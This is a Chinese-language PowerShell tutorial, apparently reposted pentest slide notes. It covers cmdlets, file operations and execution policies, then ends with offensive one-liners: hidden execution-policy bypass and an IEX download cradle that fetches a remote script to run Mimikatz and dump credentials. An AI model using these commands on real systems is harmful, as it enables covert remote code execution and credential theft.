powershell基本使用文档

1. POWERSHELL简介
2. POWERSPLOIT
3. 内网渗透实例
   powershell简介
   Powershell 是运行在windows上实现系统和应用程序管理自动化的命令行脚本 环境。你可以把它看成是命令行提示符cmd.exe的扩充，或是颠覆。
   powershell需要.NET环境的支持，同时支持.NET对象。其可读性，易用性，可 以位居当前所有shell之首。 当前powershell有四版本，分别为1.0，2.0， 3.0 ,4.0

powershell简介
CMD命令
netstat ipconfig route print ls/dir cls …
LINUX命令
mkdir rm ls clear …
PowerShell命令的一些基本知识
 PowerShell的命令叫做cmdlet
 具有一致的命名规范，都采用动词名词形式，如New-Item
 动词部分一般为Add、New、Get、 Remove、Set等
 命令的别名一般兼容Windows Command以及Linux Shell，如GetChildItem命令使用dir或ls均可
 PowerShell命令不区分大小写

powershell简介
以文件操作为例讲解PowerShell命令的基本用法
 新建目录 New-Item whitecellclub -ItemType Directory
 新建文件 New-Item light.txt -ItemType File
 删除目录 Remove-Item whitecellclub
 显示文本内容 Get-Content light.txt
 设置文本内容 Set-Content light.txt -Value “i love light so much”
 追加内容 Add-Content light.txt -Value “but i love you more”
 清除内容 Clear-Content light.txt

powershell简介
powershell脚本
了解计算机上的现用执行策略，键入：get-executionpolicy
 Restricted——默认的设置， 不允许任何script运行  AllSigned——只能运行经过数字证书签名的script  RemoteSigned——运行本地的script不需要数字签名，但是运行从网络上 下载的script就必须要有数字签名  Unrestricted——允许所有的script运行。
若要在本地计算机上运行您编写的未签名脚本和来自其他用户的签名脚本， 请使用以下命令将计算机上的执行策略更改为 RemoteSigned： set-executionpolicy remotesigned

powershell简介
powershell脚本
PS C:Usersadministrat0rDesktop> ‘“Hello,Hackers”’ > test.ps1
PS C:Usersadministrat0rDesktop> .test.ps1
Hello,Hackers

powershell脚本
本地权限绕过执行 PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本 PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden（隐藏窗口） -File xxx.ps1
直接用IEX下载远程的PS1脚本回来权限绕过执行 powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI’); InvokeMimikatz -DumpCreds”

最后

以上就是香蕉大门为你收集整理的powershell基本使用文档的全部内容，希望文章能够帮你解决powershell基本使用文档所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。